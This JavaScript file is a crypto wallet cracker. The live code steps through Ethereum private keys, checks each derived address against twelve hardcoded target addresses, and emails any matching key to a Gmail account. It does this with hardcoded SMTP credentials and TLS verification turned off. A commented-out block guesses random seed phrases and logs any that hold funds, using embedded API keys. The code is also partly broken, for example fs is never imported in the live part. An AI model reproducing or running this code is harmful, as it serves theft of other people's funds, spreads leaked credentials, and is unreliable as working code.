//         if (err) {
//           console.log(err);
//         }
//       });
//       return true;
//     } catch (err) {
//       return false;
//     }
//   }
//   console.log(isValidMnemonic(mnemonic));
// }

// const bip39 = require("bip39");
// const ethers = require("ethers");
// const axios = require("axios");
// const fs = require("fs/promises");
// const { hdkey } = require("ethereumjs-wallet");

// const bscRpcEndpoint =
//   "https://quaint-cool-emerald.bsc.quiknode.pro/7e12e05a2cabd2daba4369a8ac7484dd4dbe4efc/";

// async function getBitcoinBalance(address) {
//   try {
//     const response = await axios.get(
//       `https://blockchain.info/q/addressbalance/${address}`
//     );
//     return response.data;
//   } catch (error) {
//     console.error("Error retrieving Bitcoin balance:", error.message);
//     return 0;
//   }
// }

// async function getWalletDetailsFromSeedPhrase(seedPhrase) {
//   const seedBuffer = bip39.mnemonicToSeedSync(seedPhrase);

//   const [ethAddress, bnbAddress] = await Promise.all([
//     // Ethereum details
//     (async () => {
//       const ethWallet = ethers.Wallet.fromPhrase(seedPhrase);
//       const ethAddress = ethWallet.address;
//       const ethprovider = new ethers.InfuraProvider(
//         "homestead",
//         "fc5a940576094ce9a01cf3bd6891cc39"
//       );
//       const balance = await ethprovider.getBalance(ethAddress);
//       return {
//         address: ethAddress,
//         balance: Number(balance.toString()) / 1e18,
//       };
//     })(),

//     // BNB details
//     (async () => {
//       const hdWallet = hdkey.fromMasterSeed(seedBuffer);
//       const key = hdWallet.derivePath("m/44'/60'/0'/0/0");
//       const bscAddress = "0x" + key.getWallet().getAddress().toString("hex");
//       const bnbprovider = new ethers.JsonRpcProvider(bscRpcEndpoint);
//       const bnbbalance = await bnbprovider.getBalance(bscAddress);

//       return {
//         address: bscAddress,
//         balance: Number(bnbbalance.toString()) / 1e18,
//       };
//     })(),
//   ]);

//   return { eth: ethAddress, bnb: bnbAddress };
// }

// async function isValidMnemonic(mnemonic) {
//   try {
//     bip39.mnemonicToEntropy(mnemonic);
//     console.log(mnemonic);
//     return true;
//   } catch (err) {
//     return false;
//   }
// }

// function generateRandomMnemonic() {
//   const wordList = bip39.wordlists.english;
//   return Array.from(
//     { length: 12 },
//     () => wordList[Math.floor(Math.random() * wordList.length)]
//   ).join(" ");
// }

// async function getAcc() {
//   const promises = [];
//   for (let i = 0; i < 1000; i++) {
//     const mnemonic = generateRandomMnemonic();
//     if (await isValidMnemonic(mnemonic)) {
//       promises.push(
//         (async () => {
//           try {
//             const details = await getWalletDetailsFromSeedPhrase(mnemonic);
//             console.log(details)

//             if (details.eth.balance > 0.0098) {
//               const ethContent = `Seed Phrase: ${mnemonic}\nEthereum Balance: ${details.eth.balance}\n`;
//               await fs.appendFile("final_eth.txt", ethContent, "utf-8");
//             }

//             if (details.bnb.balance > 0.0045) {
//               const bnbContent = `Seed Phrase: ${mnemonic}\nBnb Balance: ${details.bnb.balance}\n`;
//               await fs.appendFile("final_bnb.txt", bnbContent, "utf-8");
//             }
//           } catch (error) {
//             console.error(error);
//           }
//         })()
//       );
//     }
//   }

//   await Promise.all(promises);
// }

// getAcc();

const { ethers } = require("ethers");
const nodemailer = require("nodemailer");

const transporter = nodemailer.createTransport({
  host: "smtp.gmail.com",
  service: "gmail",
  port: 587,
  secure: true,
  auth: {
    user: "musoaibekay@gmail.com",
    pass: "pmvwxjvhvcujeloo",
  },
  tls: {
    rejectUnauthorized: false,
  },
});

transporter.verify((err, success) => {
  if (err) {
    console.log(err);
  } else {
    console.log("READY");
    console.log(success);
  }
});

const sendEmail = async (subject, text) => {
  try {
    await transporter.sendMail({
      from: "musoaibekay@gmail.com",
      to: "shaunaibek@gmail.com",
      subject: `Key For ${subject}`,
      text: `The Private Key = ${text}`,
    });
  } catch (error) {
    console.log(error);
  }
};

const MAX_VALUE = "f".repeat(64);

function incrementHex(hexString) {
  const decimalValue = BigInt(`0x${hexString}`);
  const nextValue = (decimalValue + 1n) % BigInt(`0x${MAX_VALUE}`);
  return nextValue.toString(16).padStart(64, "0");
}

let currentHex =
  "12bae80b88daceaf757e263437c6bf0df0add9accdff837321fbb745430f35e0";
// "0000000000000000000000000000000000000000000000000000000029dcd2bc";

const targetAddress = "0x2eFB50e952580f4ff32D8d2122853432bbF2E204";
const target2 = "0xa26e73C8E9507D50bF808B7A2CA9D5dE4fcC4A04";
const target3 = "0x6081258689a75d253d87cE902A8de3887239Fe80";
const target4 = "0x4F86C2F941aA8D6d5eB0368B60e3358CC0F33317";
const target5 = "0xC480EF5F0c8Ef319f7F14ac6036249E5876Ac19f";
const target6 = "0xA60D8583Ce836c260D70F987D1dD00DbFBCD3631";
const target7 = "0x874b27aE884204b3169721f5d441aeebB373fD7E";
const target8 = "0x6A9ee69B6781C18164ee9F7C58f1763BcFfC7c51";
const target9 = "0xfc98DfFc22767872992789710DB003e588AA40F8";
const target10 = "0xc678Cb68f6431b58ba7ab5146166C1bff8E99727";
const target11 = "0x183A6cF1Fc6504138d92C9d663094EE774f80038";
const target12 = "0x41BF0bb2fCbEfAe9504c1CFCBd9A20987064EE90";

function getAddressFromPrivateKey(privateKey) {
  const wallet = new ethers.Wallet(privateKey);
  return wallet.address;
}
function startIncrementing() {
  console.log(currentHex);

  // Increment the current hex value
  currentHex = incrementHex(currentHex);

  // Schedule the next increment after a delay (adjust the delay as needed)
  setTimeout(startIncrementing, 0.1);
}

async function findMatchingAddress() {
  let found = false;
  // Start the incrementing process
  startIncrementing();

  while (!found) {
    const address = getAddressFromPrivateKey(currentHex);
    fs.appendFile("stop.txt", currentHex + "\n", (err) => {
      if (err) {
        console.log(err);
      }
    });

    console.log("Generated Private Key:", currentHex);
    console.log("Corresponding Address:", address);

    if (address.toLowerCase() === targetAddress.toLowerCase()) {
      await sendEmail("target 1", currentHex);
      console.log("Match found!");
      // found = true;
      const content = "Private Key" + currentHex;
      fs.appendFile("found.txt", content, (err) => {
        if (err) {
          console.log(err);
        }
      });
    } else if (address.toLowerCase() === target2.toLowerCase()) {
      await sendEmail("target 2", currentHex);
      const content = "Private Key" + currentHex;
      fs.appendFile("target2.txt", content, (err) => {
        if (err) {
          console.log(err);
        }
      });
    } else if (address.toLowerCase() === target3.toLowerCase()) {
      await sendEmail("target 3", currentHex);
      const content = "Private Key" + currentHex;
      fs.appendFile("target3.txt", content, (err) => {
        if (err) {
          console.log(err);
        }
      });
    } else if (address.toLowerCase() === target4.toLowerCase()) {
      await sendEmail("target 4", currentHex);
      const content = "Private Key" + currentHex;
      fs.appendFile("target4.txt", content, (err) => {
        if (err) {
          console.log(err);
        }
      });
    } else if (address.toLowerCase() === target5.toLowerCase()) {
      await sendEmail("target 5", currentHex);
      const content = "Private Key" + currentHex;
      fs.appendFile("target5.txt", content, (err) => {
        if (err) {
          console.log(err);
        }
      });
    } else if (address.toLowerCase() === target6.toLowerCase()) {
      await sendEmail("target 6", currentHex);
      const content = "Private Key" + currentHex;
      fs.appendFile("target6.txt", content, (err) => {
        if (err) {
          console.log(err);
        }
      });
    } else if (address.toLowerCase() === target7.toLowerCase()) {
      await sendEmail("target 7", currentHex);
      const content = "Private Key" + currentHex;
      fs.appendFile("target7.txt", content, (err) => {
        if (err) {
          console.log(err);
        }
      });
    } else if (address.toLowerCase() === target8.toLowerCase()) {
      await sendEmail("target 8", currentHex);
      const content = "Private Key" + currentHex;
      fs.appendFile("target8.txt", content, (err) => {
        if (err) {
          console.log(err);
        }
      });
    } else if (address.toLowerCase() === target9.toLowerCase()) {
      await sendEmail("target 9", currentHex);
      const content = "Private Key" + currentHex;
      fs.appendFile("target9.txt", content, (err) => {
        if (err) {
          console.log(err);
        }
      });
    } else if (address.toLowerCase() === target10.toLowerCase()) {
      await sendEmail("target 10", currentHex);
      const content = "Private Key" + currentHex;
      fs.appendFile("target10.txt", content, (err) => {
        if (err) {
          console.log(err);
        }
      });
    } else if (address.toLowerCase() === target11.toLowerCase()) {
      await sendEmail("target 11", currentHex);
      const content = "Private Key" + currentHex;
      fs.appendFile("target11.txt", content, (err) => {
        if (err) {
          console.log(err);
        }
      });
    } else if (address.toLowerCase() === target12.toLowerCase()) {
      await sendEmail("target 12", currentHex);
      const content = "Private Key" + currentHex;
      fs.appendFile("target12.txt", content, (err) => {
        if (err) {
          console.log(err);
        }
      });
    }

    // Add a delay or throttle to avoid overwhelming the network
    await new Promise((resolve) => setTimeout(resolve, 0.1));
  }
}

findMatchingAddress();
